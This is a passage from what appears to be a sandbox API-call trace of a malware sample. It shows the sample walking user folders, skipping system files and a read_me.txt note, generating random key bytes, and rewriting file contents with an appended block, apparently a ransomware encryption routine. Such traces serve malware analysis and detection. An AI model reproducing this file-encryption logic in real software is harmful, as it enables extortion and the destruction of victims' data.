hHeap=0x4f10000) returned 1 [0083.220] GetProcessHeap () returned 0x4f10000 [0083.220] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.220] CloseHandle (hObject=0x918) returned 1 [0083.221] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 103 [0083.221] GetProcessHeap () returned 0x4f10000 [0083.221] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c90050 [0083.221] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*") returned 38 [0083.221] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0083.221] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\.") returned 38 [0083.221] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.221] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\..") returned 39 [0083.221] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.221] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0083.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f8 [0083.221] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0083.221] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0083.221] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0083.221] CloseHandle (hObject=0x8f8) returned 1 [0083.222] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed3f00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24efa060, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.222] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\read_me.txt") returned 48 [0083.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\links\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f8 [0083.222] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.222] CloseHandle (hObject=0x8f8) returned 1 [0083.222] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0083.222] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0083.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f8 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="read_me.txt") returned 0x0 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="autoexec.bat") returned 0x0 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="desktop.ini") returned 0x0 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="autorun.inf") returned 0x0 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="ntuser.dat") returned 0x0 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="iconcache.db") returned 0x0 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="bootsect.bak") returned 0x0 [0083.222] StrStrW (lpFirst="web slice gallery.url", lpSrch="boot.ini") returned 0x0 [0083.223] StrStrW (lpFirst="web slice gallery.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.223] StrStrW (lpFirst="web slice gallery.url", lpSrch="thumbs.db") returned 0x0 [0083.223] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 213 [0083.223] QueueUserWorkItem (Function=0x404e00, Context=0x8f8, Flags=0x0) returned 1 [0083.223] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="web slice gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0083.223] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0083.223] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\read_me.txt") returned 48 [0083.223] GetProcessHeap () returned 0x4f10000 [0083.223] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c90050 | out: hHeap=0x4f10000) returned 1 [0083.223] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 105 [0083.223] GetProcessHeap () returned 0x4f10000 [0083.223] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b400a8 | out: hHeap=0x4f10000) returned 1 [0083.223] SetFilePointerEx (in: hFile=0x920, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.223] ReadFile (in: hFile=0x920, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0083.223] SetFilePointerEx (in: hFile=0x920, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.223] GetProcessHeap () returned 0x4f10000 [0083.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.223] GetProcessHeap () returned 0x4f10000 [0083.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.223] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.223] GetProcessHeap () returned 0x4f10000 [0083.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0083.223] ReadFile (in: hFile=0x920, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x85, lpOverlapped=0x0) returned 1 [0083.226] SetFilePointerEx (in: hFile=0x920, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.226] WriteFile (in: hFile=0x920, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x85, lpOverlapped=0x0) returned 1 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.226] GetProcessHeap () returned 0x4f10000 [0083.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.227] GetProcessHeap () returned 0x4f10000 [0083.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.228] GetProcessHeap () returned 0x4f10000 [0083.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.229] GetProcessHeap () returned 0x4f10000 [0083.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.230] GetProcessHeap () returned 0x4f10000 [0083.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.230] SetFilePointerEx (in: hFile=0x920, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.230] WriteFile (in: hFile=0x920, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.232] WriteFile (in: hFile=0x920, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.232] GetProcessHeap () returned 0x4f10000 [0083.232] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.232] GetProcessHeap () returned 0x4f10000 [0083.232] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.232] GetProcessHeap () returned 0x4f10000 [0083.232] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.232] CloseHandle (hObject=0x920) returned 1 [0083.233] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 104 [0083.233] GetProcessHeap () returned 0x4f10000 [0083.233] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c90050 [0083.233] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned 51 [0083.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24efa060, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24efa060, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0083.233] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\.") returned 51 [0083.233] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24efa060, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24efa060, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.233] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\..") returned 52 [0083.233] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0083.233] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0083.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x924 [0083.247] StrStrW (lpFirst="ie add-on site.url", lpSrch="read_me.txt") returned 0x0 [0083.247] StrStrW (lpFirst="ie 